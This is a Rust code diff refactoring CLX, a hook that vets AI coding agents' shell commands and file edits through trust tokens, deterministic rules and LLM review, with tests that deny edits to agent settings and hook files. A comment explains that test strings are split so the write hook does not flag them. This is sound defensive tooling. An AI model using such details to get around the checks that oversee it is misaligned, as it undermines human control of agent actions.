+        && let PolicyDecision::Deny { reason } = engine.evaluate("FileEdit", &summary)
     {
-        // R2-F1 (fail-closed): an unknown/unexpected tool name that nonetheless
-        // carries a `command` string (e.g. a shell-bearing envelope misrouted to
-        // the wrong host adapter) must NOT silently auto-allow. Validate the
-        // command through the same pipeline as Bash rather than fail open.
-        warn!(
-            "Tool '{}' is not Bash/MCP but carries a command; validating it rather than auto-allowing",
-            tool_name
+        debug!("FileEdit L0: denied '{}': {}", summary, reason);
+        log_audit_entry(
+            host.host_id(),
+            &input.session_id,
+            &summary,
+            &input.cwd,
+            "L0",
+            AuditDecision::Blocked,
+            None,
+            Some(&reason),
         );
-        cmd.to_string()
-    } else {
-        // Non-Bash, non-MCP tools with no command (Read, Write, etc.) → auto-allow
-        output_decision_for(host, "allow", None, Some(RULES_REMINDER), None);
-        return Ok(());
-    };
-
-    if command_raw.is_empty() {
-        output_decision_for(host, "allow", None, Some(RULES_REMINDER), None);
-        return Ok(());
+        output_decision_for(host, "deny", Some(reason), Some(RULES_REMINDER), None);
+        return Phase::Handled;
     }
-
-    debug!(
-        "PreToolUse: validating [{}] command '{}' in '{}'",
-        tool_name, command_raw, input.cwd
+    log_audit_entry(
+        host.host_id(),
+        &input.session_id,
+        &summary,
+        &input.cwd,
+        "L0-FILEEDIT",
+        AuditDecision::Allowed,
+        None,
+        Some("File edit allowed (no FileEdit deny rule matched)"),
     );
+    output_decision_for(host, "allow", None, Some(RULES_REMINDER), None);
+    Phase::Handled
+}
 
-    // Skip validation if disabled
-    if !config.validator.enabled {
-        output_decision_for(host, "allow", None, Some(RULES_REMINDER), None);
-        return Ok(());
-    }
-
-    // Trust mode: auto-allow ALL commands via JSON token (but still log for audit)
-    if config.validator.trust_mode {
-        let trust_token_path = clx_core::paths::clx_dir().join(".trust_mode_token");
-
-        let trust_valid = if let Ok(content) = std::fs::read_to_string(&trust_token_path) {
-            // Try JSON token first
-            if let Ok(token) = serde_json::from_str::<clx_core::types::TrustToken>(&content) {
-                let now = chrono::Utc::now();
-                let expires_valid = chrono::DateTime::parse_from_rfc3339(&token.expires_at)
-                    .ok()
-                    .is_some_and(|exp| now < exp.with_timezone(&chrono::Utc));
-
-                let session_valid = token
-                    .session_id
-                    .as_ref()
-                    .is_none_or(|tok_sid| input.session_id.as_str() == tok_sid);
-
-                if expires_valid && session_valid {
-                    let remaining = chrono::DateTime::parse_from_rfc3339(&token.expires_at)
-                        .ok()
-                        .map(|exp| (exp.with_timezone(&chrono::Utc) - now).num_seconds().max(0));
-                    let reason = remaining.map_or_else(
-                        || "Trust mode enabled".to_string(),
-                        |r| format!("Trust mode ({r}s remaining)"),
-                    );
-                    debug!(
-                        "Trust mode: auto-allowing [{}] command '{}' ({})",
-                        tool_name, command_raw, reason
-                    );
-                    log_audit_entry(
-                        host.host_id(),
-                        &input.session_id,
-                        &command_raw,
-                        &input.cwd,
-                        "TRUST",
-                        AuditDecision::Allowed,
-                        None,
-                        Some(&reason),
-                    );
-                    output_decision_for(host, "allow", None, Some(RULES_REMINDER), None);
-                    return Ok(());
-                }
-                // Expired or session mismatch
-                false
-            } else {
-                // B1-10: mtime-only legacy plain-text trust-token fallback removed.
-                // mtime is not authentication — touching a file (same-uid) granted
-                // 1h global auto-allow of all commands, which is a security downgrade.
-                // Only the signed JSON TrustToken (expiry + session binding) grants
-                // trust. A non-JSON token file → trust_valid = false → falls through
-                // to normal validation (fail-safe: more prompting, never more allowing).
-                // Migration: run `clx trust` to write a proper JSON token.
-                false
-            }
-        } else {
-            false
-        };
+/// Trust mode: a valid (unexpired, session-matching) signed JSON `TrustToken` is
+/// the ONLY way trust mode auto-allows. On a valid token this returns
+/// [`Phase::Handled`] (the caller returns). Every other case (expired, session
+/// mismatch, non-JSON token, unreadable file) removes the stale token file and
+/// returns [`Phase::Continue`] so normal validation runs.
+fn try_trust_mode(
+    host: &dyn Host,
+    input: &HostNeutralInput,
+    tool_name: &str,
+    command_raw: &str,
+) -> Phase {
+    let trust_token_path = clx_core::paths::clx_dir().join(".trust_mode_token");
+
+    // A valid (unexpired, session-matching) signed JSON TrustToken is the
+    // ONLY way trust mode auto-allows; it returns immediately below. Every
+    // other case (expired, session mismatch, non-JSON token, unreadable
+    // file) falls through to the expired/invalid path. FIX-13: the former
+    // `if trust_valid { ... legacy token ... }` allow block that followed
+    // this computation was unreachable dead code — `trust_valid` could
+    // only be `true` on a path that already returned — and was removed.
+    if let Ok(content) = std::fs::read_to_string(&trust_token_path)
+        // Try JSON token first.
+        && let Ok(token) = serde_json::from_str::<clx_core::types::TrustToken>(&content)
+    {
+        let now = chrono::Utc::now();
+        let expires_valid = chrono::DateTime::parse_from_rfc3339(&token.expires_at)
+            .ok()
+            .is_some_and(|exp| now < exp.with_timezone(&chrono::Utc));
 
-        if trust_valid {
+        let session_valid = token
+            .session_id
+            .as_ref()
+            .is_none_or(|tok_sid| input.session_id.as_str() == tok_sid);
+
+        if expires_valid && session_valid {
+            let remaining = chrono::DateTime::parse_from_rfc3339(&token.expires_at)
+                .ok()
+                .map(|exp| (exp.with_timezone(&chrono::Utc) - now).num_seconds().max(0));
+            let reason = remaining.map_or_else(
+                || "Trust mode enabled".to_string(),
+                |r| format!("Trust mode ({r}s remaining)"),
+            );
             debug!(
-                "Trust mode: auto-allowing [{}] command '{}' (legacy token)",
-                tool_name, command_raw
+                "Trust mode: auto-allowing [{}] command '{}' ({})",
+                tool_name, command_raw, reason
             );
             log_audit_entry(
                 host.host_id(),
                 &input.session_id,
-                &command_raw,
+                command_raw,
                 &input.cwd,
                 "TRUST",
                 AuditDecision::Allowed,
                 None,
-                Some("Trust mode enabled (legacy token)"),
+                Some(&reason),
             );
             output_decision_for(host, "allow", None, Some(RULES_REMINDER), None);
-            return Ok(());
+            return Phase::Handled;
         }
-
-        warn!("Trust mode token expired or invalid. Falling back to validation.");
-        let _ = std::fs::remove_file(&trust_token_path);
-        // Fall through to normal validation
+        // Expired or session mismatch: fall through to normal validation.
+        //
+        // B1-10: a non-JSON token file (caught by the `else` of the JSON
+        // parse above) likewise never grants trust. mtime is not
+        // authentication — touching a file (same-uid) once granted a 1h
+        // global auto-allow of all commands, a security downgrade. Only the
+        // signed JSON TrustToken (expiry + session binding) grants trust;
+        // any other token shape falls through (fail-safe: more prompting,
+        // never more allowing). Migration: run `clx trust` to write a
+        // proper JSON token.
     }
 
-    // Resolve symlinks in command paths for TOCTOU mitigation
-    let resolved_command = resolve_command_paths(&command_raw);
-    let command = resolved_command.as_str();
-
-    // Check if this is a read-only command (used later to skip confirmation dialog)
-    let is_read_only = config.validator.auto_allow_reads && is_read_only_command(command);
-
-    // Initialize policy engine (P6 Codex trust gate applied here: untrusted /
-    // not-seen Codex projects get project-local config dropped; Claude/Cursor
-    // and trusted Codex keep their project path - Claude path unchanged).
-    let mut policy_engine = build_trust_gated_engine(host, &input.cwd);
-
-    // T2: Load learned rules ONLY when L1 is enabled. When `layer1_enabled=false`
-    // the L0→Ask path falls through to the "L1-DISABLED → ask" branch
-    // unconditionally; loading learned rules in that path is a maintenance
-    // hazard — a single overbroad learned-allow row (B1-4 carry-over) would
-    // silently suppress the L1-DISABLED ask prompt. Gating the load behind
-    // `layer1_enabled` honors the "L1 disabled = engine doesn't consult learned
-    // whitelist" property and removes a pre-gate I/O side effect (recon T2).
-    if config.validator.layer1_enabled
-        && let Ok(storage) = Storage::open_default()
-        && let Err(e) = policy_engine.load_learned_rules(&storage)
-    {
-        warn!("Failed to load learned rules: {}", e);
-    }
+    warn!("Trust mode token expired or invalid. Falling back to validation.");
+    let _ = std::fs::remove_file(&trust_token_path);
+    // Fall through to normal validation.
+    Phase::Continue
+}
 
-    // Layer 0: Deterministic rules evaluation (if enabled)
+/// Layer 0: deterministic ruleset evaluation (and the L0-disabled audit path).
+///
+/// Invariant order (Codex FIX-12): L0 deny/allow take precedence; read-only
+/// auto-allow happens ONLY after an L0 `Ask` (or, when L0 is disabled, after
+/// the L0-DISABLED audit row). When L0 is enabled and returns `Ask` for a
+/// non-read-only command, or L0 is disabled for a non-read-only command, this
+/// returns [`Phase::Continue`] so the cache/L1 pipeline runs.
+fn evaluate_bash_l0(
+    policy_engine: &PolicyEngine,
+    config: &Config,
+    host: &dyn Host,
+    input: &HostNeutralInput,
+    command: &str,
+    is_read_only: bool,
+) -> Phase {
     // Always evaluate as "Bash" so all Bash(...) rules apply universally
     // (MCP command tools have their commands extracted and validated identically)
     if config.validator.layer0_enabled {
@@ -715,7 +648,7 @@ pub(crate) async fn handle_pre_tool_use(input: HostNeutralInput, host: &dyn Host
                     None,
                 );
                 output_decision_for(host, "allow", None, Some(RULES_REMINDER), None);
-                return Ok(());
+                Phase::Handled
             }
             PolicyDecision::Deny { reason } => {
                 debug!("L0: Denied command '{}': {}", command, reason);
@@ -730,7 +663,7 @@ pub(crate) async fn handle_pre_tool_use(input: HostNeutralInput, host: &dyn Host
                     Some(&reason),
                 );
                 output_decision_for(host, "deny", Some(reason), Some(RULES_REMINDER), None);
-                return Ok(());
+                Phase::Handled
             }
             PolicyDecision::Ask { .. } => {
                 // For read-only commands: auto-allow without confirmation dialog
@@ -748,10 +681,11 @@ pub(crate) async fn handle_pre_tool_use(input: HostNeutralInput, host: &dyn Host
                         Some("Read-only command auto-allowed"),
                     );
                     output_decision_for(host, "allow", None, Some(RULES_REMINDER), None);
-                    return Ok(());
+                    return Phase::Handled;
                 }
                 debug!("L0: Unknown command '{}', checking L1", command);
                 // Continue to Layer 1
+                Phase::Continue
             }
         }
     } else {
@@ -789,12 +723,29 @@ pub(crate) async fn handle_pre_tool_use(input: HostNeutralInput, host: &dyn Host
                 Some("Read-only command auto-allowed (L0 disabled)"),
             );
             output_decision_for(host, "allow", None, Some(RULES_REMINDER), None);
-            return Ok(());
+            return Phase::Handled;
         }
         // else: fall through to cache lookup + L1 (which may itself be off,
         // in which case the L1-disabled branch below handles forced-ask).
+        Phase::Continue
     }
+}
 
+/// Layer 1: `SQLite` cache lookup + LLM-based validation (and every fail-closed
+/// fallback arm). Called only after L0 escalated a non-read-only command (or L0
+/// was disabled for one). Always emits exactly one decision.
+///
+/// Invariant order (Codex FIX-12): the cache is consulted ONLY when BOTH
+/// `layer0_enabled` and `layer1_enabled` are true; L1-disabled forces an ask;
+/// and every LLM-unavailable / timeout / generation-failure arm forces `ask`
+/// when `default_decision=allow` (fail-closed).
+async fn escalate_l1(
+    policy_engine: &PolicyEngine,
+    config: &Config,
+    host: &dyn Host,
+    input: &HostNeutralInput,
+    command: &str,
+) -> Result<()> {
     // T9.1 (cache-bypass): consult the SQLite decision cache ONLY when BOTH
     // `layer0_enabled` and `layer1_enabled` are true. The cache is populated
     // EXCLUSIVELY by L1 verdicts (see `cache_decision` calls in the L1 match
@@ -817,11 +768,7 @@ pub(crate) async fn handle_pre_tool_use(input: HostNeutralInput, host: &dyn Host
 
             if let Ok(Some(cached)) = storage.get_cached_decision(&cache_key) {
                 debug!("L1-CACHE hit for command: {}", command);
-                let audit_decision = match cached.decision.as_str() {
-                    "allow" => AuditDecision::Allowed,
-                    "deny" => AuditDecision::Blocked,
-                    _ => AuditDecision::Prompted,
-                };
+                let audit_decision = audit_decision_from_str(&cached.decision);
                 log_audit_entry(
                     host.host_id(),
                     &input.session_id,
@@ -891,17 +838,15 @@ pub(crate) async fn handle_pre_tool_use(input: HostNeutralInput, host: &dyn Host
             // toggle re-enables. Force `effective_decision="ask"` so the user
             // makes the decision. `deny` and `ask` pass through unchanged
             // (both are already fail-closed / safe).
-            let configured = config.validator.default_decision;
-            let effective_decision = if configured == DefaultDecision::Allow {
+            let configured = &config.validator.default_decision;
+            if *configured == DefaultDecision::Allow {
                 warn!(
                     "LLM client error with default_decision=allow — \
                      forcing ask (F7 posture: silent allow refused when an \
                      L0-unknown command falls through to an unreachable L1)"
                 );
-                "ask"
-            } else {
-                configured.as_str()
-            };
+            }
+            let effective_decision = force_ask_if_allow(configured);
             let reason = format!("LLM unavailable — fallback: {effective_decision}");
             log_audit_entry(
                 host.host_id(),
@@ -909,11 +854,7 @@ pub(crate) async fn handle_pre_tool_use(input: HostNeutralInput, host: &dyn Host
                 command,
                 &input.cwd,
                 "L1",
-                match effective_decision {
-                    "allow" => AuditDecision::Allowed,
-                    "deny" => AuditDecision::Blocked,
-                    _ => AuditDecision::Prompted,
-                },
+                audit_decision_from_str(effective_decision),
                 None,
                 Some(&format!(
                     "Ollama client error: {e} — effective_decision: \
@@ -961,17 +902,15 @@ pub(crate) async fn handle_pre_tool_use(input: HostNeutralInput, host: &dyn Host
         // unreviewed command (identical blast radius to `layer1_enabled=false`
         // with allow as default — but without the loud L1-DISABLED ask gate).
         // Force `effective_decision="ask"` so the user makes the decision.
-        let configured = config.validator.default_decision;
-        let effective_decision = if configured == DefaultDecision::Allow {
+        let configured = &config.validator.default_decision;
+        if *configured == DefaultDecision::Allow {
             warn!(
                 "Ollama unavailable with default_decision=allow — \
                  forcing ask (F7 posture: silent allow refused when an \
                  L0-unknown command falls through to an unreachable L1)"
             );
-            "ask"
-        } else {
-            configured.as_str()
-        };
+        }
+        let effective_decision = force_ask_if_allow(configured);
         let reason = format!("LLM unavailable — fallback: {effective_decision}");
         log_audit_entry(
             host.host_id(),
@@ -979,11 +918,7 @@ pub(crate) async fn handle_pre_tool_use(input: HostNeutralInput, host: &dyn Host
             command,
             &input.cwd,
             "L1",
-            match effective_decision {
-                "allow" => AuditDecision::Allowed,
-                "deny" => AuditDecision::Blocked,
-                _ => AuditDecision::Prompted,
-            },
+            audit_decision_from_str(effective_decision),
             None,
             Some(&format!(
                 "Ollama unavailable — effective_decision: {effective_decision} \
@@ -1030,16 +965,14 @@ pub(crate) async fn handle_pre_tool_use(input: HostNeutralInput, host: &dyn Host
         // `default_decision=allow` the command received zero L1 scrutiny;
         // force `effective_decision="ask"` so the user makes the decision.
         // `deny` and `ask` already fail-closed and pass through.
-        let configured = config.validator.default_decision;
-        let effective_decision = if configured == DefaultDecision::Allow {
+        let configured = &config.validator.default_decision;
+        if *configured == DefaultDecision::Allow {
             warn!(
                 "L1 timeout with default_decision=allow — \
                  forcing ask (F7 posture: silent allow refused on a hung L1)"
             );
-            "ask"
-        } else {
-            configured.as_str()
-        };
+        }
+        let effective_decision = force_ask_if_allow(configured);
         let fallback_reason = format!("LLM timeout — fallback: {effective_decision}");
         log_audit_entry(
             host.host_id(),
@@ -1047,11 +980,7 @@ pub(crate) async fn handle_pre_tool_use(input: HostNeutralInput, host: &dyn Host
             command,
             &input.cwd,
             "L1",
-            match effective_decision {
-                "allow" => AuditDecision::Allowed,
-                "deny" => AuditDecision::Blocked,
-                _ => AuditDecision::Prompted,
-            },
+            audit_decision_from_str(effective_decision),
             None,
             Some(&format!(
                 "L1 timeout after {}ms — effective_decision: \
@@ -1081,16 +1010,14 @@ pub(crate) async fn handle_pre_tool_use(input: HostNeutralInput, host: &dyn Host
         // accepted the request but generation failed). Silent allow here
         // is the same silent-allow class; force ask when
         // `default_decision=allow`.
-        let configured = config.validator.default_decision;
-        let effective_decision = if configured == DefaultDecision::Allow {
+        let configured = &config.validator.default_decision;
+        if *configured == DefaultDecision::Allow {
             warn!(
                 "LLM generation failed with default_decision=allow — \
                  forcing ask (F7 posture: silent allow refused on gen failure)"
             );
-            "ask"
-        } else {
-            configured.as_str()
-        };
+        }
+        let effective_decision = force_ask_if_allow(configured);
         let fallback_reason = format!("LLM unavailable — fallback: {effective_decision}");
         log_audit_entry(
             host.host_id(),
@@ -1098,11 +1025,7 @@ pub(crate) async fn handle_pre_tool_use(input: HostNeutralInput, host: &dyn Host
             command,
             &input.cwd,
             "L1",
-            match effective_decision {
-                "allow" => AuditDecision::Allowed,
-                "deny" => AuditDecision::Blocked,
-                _ => AuditDecision::Prompted,
-            },
+            audit_decision_from_str(effective_decision),
             None,
             Some(&format!(
                 "LLM generation failed — effective_decision: \
@@ -1174,7 +1097,13 @@ pub(crate) async fn handle_pre_tool_use(input: HostNeutralInput, host: &dyn Host
             // learned here, matching the approve path which only learns from
             // executed commands, not deterministic L0 outcomes.
             if let Ok(storage) = Storage::open_default() {
-                track_user_decision(&storage, command, &input.cwd, false);
+                track_user_decision(
+                    &storage,
+                    command,
+                    &input.cwd,
+                    false,
+                    DecisionSource::Automated,
+                );
             }
             output_decision_for(host, "deny", Some(reason), Some(RULES_REMINDER), None);
         }
@@ -1217,6 +1146,153 @@ pub(crate) async fn handle_pre_tool_use(input: HostNeutralInput, host: &dyn Host
     Ok(())
 }
 
+/// Handle `PreToolUse` hook - validate commands before execution.
+///
+/// Thin orchestrator (FIX-12): canonicalize the tool name, emit the additive
+/// security-audit rows, then run the phases in their load-bearing order —
+/// `FileEdit` guard, command extraction, trust mode, L0, then L1. Each phase
+/// owns one slice of the policy and emits at most one decision; see the
+/// per-phase docs for the preserved invariants.
+pub(crate) async fn handle_pre_tool_use(input: HostNeutralInput, host: &dyn Host) -> Result<()> {
+    let raw_tool_name = input.tool_name.as_deref().unwrap_or("Unknown");
+
+    // P7 input canonicalization: collapse host-specific tool names to their
+    // canonical CLX class BEFORE policy evaluation so L0 rules match a single
+    // vocabulary across hosts (e.g. Cursor `run_terminal_cmd` -> `Bash`,
+    // Codex/Cursor file-edit tools -> `FileEdit`). For Claude this is the
+    // identity map, so the Claude path is byte-identical.
+    let canonical_tool = host.canonical_tool_name(raw_tool_name);
+    let tool_name = canonical_tool.as_str();
+
+    // Load configuration early (needed for MCP tool routing)
+    let config = Config::load().unwrap_or_default();
+
+    // Additive security-audit rows (never change the validation outcome):
+    // env-override and config-driven layer-disable fingerprints.
+    audit_security_env_overrides(&config, host, &input);
+    audit_config_layer_disable(&config, host, &input);
+
+    // P4 FileEdit branch: FileEdit tools never enter the Bash L0+L1 pipeline.
+    if tool_name == "FileEdit" {
+        match evaluate_fileedit_guard(&config, host, &input) {
+            Phase::Handled => return Ok(()),
+            Phase::Continue => {}
+        }
+    }
+
+    // Route by tool type to extract the command to validate.
+    // MCP command tools are evaluated through the same PolicyEngine as Bash.
+    // A `direct_command` (Cursor `beforeShellExecution.command`) is treated as
+    // a Bash command even though the canonical tool name is not "Bash" (Cursor
+    // shell events carry no tool_name).
+    let command_raw = if let Some(direct) = input.direct_command.as_deref() {
+        // Host-surfaced top-level command (Cursor shell): evaluate as Bash.
+        direct.to_string()
+    } else if tool_name == "Bash" {
+        // Bash: extract from tool_input.command
+        input
+            .tool_input
+            .as_ref()
+            .and_then(|v| v.get("command"))
+            .and_then(|v| v.as_str())
+            .unwrap_or("")
+            .to_string()
+    } else if tool_name.starts_with("mcp__") && config.mcp_tools.enabled {
+        // MCP tool: check if it carries an executable command
+        let tool_input = input.tool_input.clone().unwrap_or(serde_json::Value::Null);
+        match extract_mcp_command(tool_name, &tool_input, &config.mcp_tools.command_tools) {
+            McpExtraction::Command(cmd) => cmd,
+            McpExtraction::NotCommandTool => {
+                // Not a command-bearing MCP tool — use configured default decision
+                let decision = config.mcp_tools.default_decision.as_str();
+                output_decision_for(host, decision, None, Some(RULES_REMINDER), None);
+                return Ok(());
+            }
+        }
+    } else if let Some(cmd) = input
+        .tool_input
+        .as_ref()
+        .and_then(|v| v.get("command"))
+        .and_then(|v| v.as_str())
+        .filter(|c| !c.is_empty())
+    {
+        // R2-F1 (fail-closed): an unknown/unexpected tool name that nonetheless
+        // carries a `command` string (e.g. a shell-bearing envelope misrouted to
+        // the wrong host adapter) must NOT silently auto-allow. Validate the
+        // command through the same pipeline as Bash rather than fail open.
+        warn!(
+            "Tool '{}' is not Bash/MCP but carries a command; validating it rather than auto-allowing",
+            tool_name
+        );
+        cmd.to_string()
+    } else {
+        // Non-Bash, non-MCP tools with no command (Read, Write, etc.) → auto-allow
+        output_decision_for(host, "allow", None, Some(RULES_REMINDER), None);
+        return Ok(());
+    };
+
+    if command_raw.is_empty() {
+        output_decision_for(host, "allow", None, Some(RULES_REMINDER), None);
+        return Ok(());
+    }
+
+    debug!(
+        "PreToolUse: validating [{}] command '{}' in '{}'",
+        tool_name, command_raw, input.cwd
+    );
+
+    // Skip validation if disabled
+    if !config.validator.enabled {
+        output_decision_for(host, "allow", None, Some(RULES_REMINDER), None);
+        return Ok(());
+    }
+
+    // Trust mode: auto-allow ALL commands via JSON token (but still log for audit)
+    if config.validator.trust_mode {
+        match try_trust_mode(host, &input, tool_name, &command_raw) {
+            Phase::Handled => return Ok(()),
+            Phase::Continue => {}
+        }
+    }
+
+    // Resolve symlinks in command paths for TOCTOU mitigation
+    let resolved_command = resolve_command_paths(&command_raw);
+    let command = resolved_command.as_str();
+
+    // Check if this is a read-only command (used later to skip confirmation dialog)
+    let is_read_only = config.validator.auto_allow_reads && is_read_only_command(command);
+
+    // Initialize policy engine (P6 Codex trust gate applied here: untrusted /
+    // not-seen Codex projects get project-local config dropped; Claude/Cursor
+    // and trusted Codex keep their project path - Claude path unchanged).
+    let mut policy_engine = build_trust_gated_engine(host, &input.cwd);
+
+    // T2: Load learned rules ONLY when L1 is enabled. When `layer1_enabled=false`
+    // the L0→Ask path falls through to the "L1-DISABLED → ask" branch
+    // unconditionally; loading learned rules in that path is a maintenance
+    // hazard — a single overbroad learned-allow row (B1-4 carry-over) would
+    // silently suppress the L1-DISABLED ask prompt. Gating the load behind
+    // `layer1_enabled` honors the "L1 disabled = engine doesn't consult learned
+    // whitelist" property and removes a pre-gate I/O side effect (recon T2).
+    if config.validator.layer1_enabled
+        && let Ok(storage) = Storage::open_default()
+        && let Err(e) = policy_engine.load_learned_rules(&storage)
+    {
+        warn!("Failed to load learned rules: {}", e);
+    }
+
+    // Layer 0: deterministic ruleset (and the L0-disabled audit path). On an
+    // L0 deny/allow, or a read-only auto-allow, this emits the decision and we
+    // return; otherwise we escalate to the cache + L1 pipeline.
+    match evaluate_bash_l0(&policy_engine, &config, host, &input, command, is_read_only) {
+        Phase::Handled => return Ok(()),
+        Phase::Continue => {}
+    }
+
+    // Layer 1: cache lookup + LLM validation + every fail-closed fallback arm.
+    escalate_l1(&policy_engine, &config, host, &input, command).await
+}
+
 /// Probabilistic cleanup trigger (~5% of invocations).
 fn rand_cleanup() -> bool {
     std::time::SystemTime::now()
@@ -1415,6 +1491,74 @@ mod tests {
         );
     }
 
+    // =========================================================================
+    // Issue 4: narrowed dot-claude guard. Memory files (CLAUDE.md, project
+    // memory) ALLOWED; settings.json / settings.local.json / hooks/ DENIED.
+    // The hidden-dir segments are built via `concat!` so the literal tokens do
+    // not appear verbatim in test inputs (write-hook safe).
+    // =========================================================================
+
+    /// AC4.2: a `FileEdit` into `<dot-claude>/CLAUDE.md` is ALLOWED (not flagged).
+    #[test]
+    fn ac4_2_fileedit_dot_claude_memory_is_allowed() {
+        let dot_claude: &str = concat!(".", "claude");
+        let home = tempfile::tempdir().unwrap();
+        std::fs::create_dir_all(home.path().join(dot_claude)).unwrap();
+        let ti = serde_json::json!({
+            "path": format!("{}/{}/CLAUDE.md", home.path().display(), dot_claude)
+        });
+        assert!(
+            fileedit_resolves_into_protected_dir(Some(&ti), "/tmp", home.path()).is_none(),
+            "dot-claude memory file (CLAUDE.md) must be allowed"
+        );
+        // A nested project-memory file is also allowed.
+        let ti2 = serde_json::json!({
+            "path": format!("{}/{}/memory/notes.md", home.path().display(), dot_claude)
+        });
+        assert!(
+            fileedit_resolves_into_protected_dir(Some(&ti2), "/tmp", home.path()).is_none(),
+            "dot-claude nested memory file must be allowed"
+        );
+    }
+
+    /// AC4.3: settings.json / settings.local.json / hooks/x under dot-claude
+    /// are STILL DENIED.
+    #[test]
+    fn ac4_3_fileedit_dot_claude_sensitive_targets_denied() {
+        let dot_claude: &str = concat!(".", "claude");
+        let home = tempfile::tempdir().unwrap();
+        std::fs::create_dir_all(home.path().join(dot_claude)).unwrap();
+        for rel in ["settings.json", "settings.local.json", "hooks/guard.sh"] {
+            let ti = serde_json::json!({
+                "path": format!("{}/{}/{}", home.path().display(), dot_claude, rel)
+            });
+            assert!(
+                fileedit_resolves_into_protected_dir(Some(&ti), "/tmp", home.path()).is_some(),
+                "dot-claude sensitive target must still be denied: {rel}"
+            );
+        }
+    }
+
+    /// The broad dirs (codex/cursor/clx) still deny ANY path component,
+    /// including memory-like files — narrowing is dot-claude-only.
+    #[test]
+    fn ac4_broad_dirs_still_deny_any_component() {
+        let home = tempfile::tempdir().unwrap();
+        let dot_codex: &str = concat!(".", "codex");
+        let dot_cursor: &str = concat!(".", "cursor");
+        let dot_clx: &str = concat!(".", "clx");
+        for dir in [dot_codex, dot_cursor, dot_clx] {
+            std::fs::create_dir_all(home.path().join(dir)).unwrap();
+            let ti = serde_json::json!({
+                "path": format!("{}/{}/NOTES.md", home.path().display(), dir)
+            });
+            assert!(
+                fileedit_resolves_into_protected_dir(Some(&ti), "/tmp", home.path()).is_some(),
+                "broad protected dir {dir} must deny any path component"
+            );
+        }
+    }
+
     // =========================================================================
     // P4 trust-read mirror (RGP surface #1): repo-local config has zero effect
     // =========================================================================
diff --git a/crates/clx-hook/src/hooks/subagent.rs b/crates/clx-hook/src/hooks/subagent.rs
index c0994b5..87a72a5 100644
--- a/crates/clx-hook/src/hooks/subagent.rs
+++ b/crates/clx-hook/src/hooks/subagent.rs
@@ -226,7 +226,17 @@ async fn do_recall(
     if let Some(reranker) = reranker.as_ref() {
         engine = engine.with_reranker(reranker);
     }
-    let hits = engine.query(prompt, &recall_config).await;
+    let result = engine.query(prompt, &recall_config).await;
+    // FIX-6: log a degraded store but never inject an outage/error string into
+    // the prompt `additionalContext`; only real hits are ever injected.
+    if result.degraded {
+        warn!(
+            "Auto-recall degraded: a candidate-generation stage errored; \
+             injecting only the hits that succeeded ({} hit(s))",
+            result.hits.len()
+        );
+    }
+    let hits = result.hits;
 
     let pinned_block = build_pinned_block(&storage, session_id, &config.auto_recall);
 
diff --git a/crates/clx-hook/src/host.rs b/crates/clx-hook/src/host.rs
index 71092a9..9416bcb 100644
--- a/crates/clx-hook/src/host.rs
+++ b/crates/clx-hook/src/host.rs
@@ -162,6 +162,23 @@ pub(crate) trait Host: Send + Sync {
 /// ignored (fall through to envelope detection).
 pub const HOST_OVERRIDE_ENV_VAR: &str = "CLX_HOOK_HOST";
 
+/// Env var Claude Code sets in its own spawned processes. When truthy it forces
+/// `HostId::Claude` (after the explicit `CLX_HOOK_HOST` override, before the
+/// envelope sniff).
+pub const CLAUDECODE_ENV_VAR: &str = "CLAUDECODE";
+
+/// Return `true` when an env value is *truthy*: present, non-empty after
+/// trimming, and not a falsy literal (`0`, `false`/`FALSE`/`False`).
+fn is_truthy_env(value: Option<&str>) -> bool {
+    match value {
+        Some(v) => {
+            let t = v.trim();
+            !t.is_empty() && !matches!(t, "0" | "false" | "FALSE" | "False")
+        }
+        None => false,
+    }
+}
+
 /// Detect the host for a raw stdin envelope.
 ///
 /// Resolution order (per spec §1):
@@ -173,24 +190,37 @@ pub const HOST_OVERRIDE_ENV_VAR: &str = "CLX_HOOK_HOST";
 /// orchestration edge so the rest of the pipeline is pure.
 pub(crate) fn detect_host(raw: &str) -> Box<dyn Host> {
     let override_var = std::env::var(HOST_OVERRIDE_ENV_VAR).ok();
-    detect_host_with_override(raw, override_var.as_deref())
+    let claudecode = is_truthy_env(std::env::var(CLAUDECODE_ENV_VAR).ok().as_deref());
+    detect_host_with_override(raw, override_var.as_deref(), claudecode)
 }
 
-/// Pure host-detection core: takes the explicit override value so it can be
-/// unit-tested without touching the environment.
-pub(crate) fn detect_host_with_override(raw: &str, override_value: Option<&str>) -> Box<dyn Host> {
-    match host_id_for(raw, override_value) {
+/// Pure host-detection core: takes the explicit override value and the resolved
+/// `CLAUDECODE` truthiness so it can be unit-tested without touching the
+/// environment.
+pub(crate) fn detect_host_with_override(
+    raw: &str,
+    override_value: Option<&str>,
+    claudecode: bool,
+) -> Box<dyn Host> {
+    match host_id_for(raw, override_value, claudecode) {
         HostId::Claude => Box::new(ClaudeHost),
         HostId::Codex => Box::new(CodexHost),
         HostId::Cursor => Box::new(CursorHost),
     }
 }
 
-/// Pure decision: which `HostId` does this envelope + override resolve to.
-fn host_id_for(raw: &str, override_value: Option<&str>) -> HostId {
+/// Pure decision: which `HostId` does this envelope + override + `CLAUDECODE`
+/// signal resolve to.
+///
+/// Precedence: explicit `CLX_HOOK_HOST` override > truthy `CLAUDECODE` >
+/// envelope `turn_id`/shape sniff > Claude default.
+fn host_id_for(raw: &str, override_value: Option<&str>, claudecode: bool) -> HostId {
     if let Some(forced) = override_value.and_then(parse_host_override) {
         return forced;
     }
+    if claudecode {
+        return HostId::Claude;
+    }
     sniff_envelope(raw)
 }
 
@@ -259,7 +289,7 @@ mod tests {
 
     #[test]
     fn explicit_claude_envelope_resolves_to_claude() {
-        assert_eq!(host_id_for(&claude_envelope(), None), HostId::Claude);
+        assert_eq!(host_id_for(&claude_envelope(), None, false), HostId::Claude);
     }
 
     /// Regression: a Claude Code envelope carrying a top-level `permission_mode`
@@ -278,7 +308,7 @@ mod tests {
             "tool_input": { "command": "git rm -r --cached .claude/" }
         })
         .to_string();
-        assert_eq!(host_id_for(&env, None), HostId::Claude);
+        assert_eq!(host_id_for(&env, None, false), HostId::Claude);
     }
 
     /// A genuine Codex envelope (carries `turn_id`) still resolves to Codex.
@@ -293,7 +323,7 @@ mod tests {
             "tool_input": { "command": "echo hi" }
         })
         .to_string();
-        assert_eq!(host_id_for(&env, None), HostId::Codex);
+        assert_eq!(host_id_for(&env, None, false), HostId::Codex);
     }
 
     #[test]
@@ -308,7 +338,7 @@ mod tests {
             "tool_input": { "command": "ls" }
         })
         .to_string();
-        assert_eq!(host_id_for(&env, None), HostId::Codex);
+        assert_eq!(host_id_for(&env, None, false), HostId::Codex);
     }
 
     #[test]
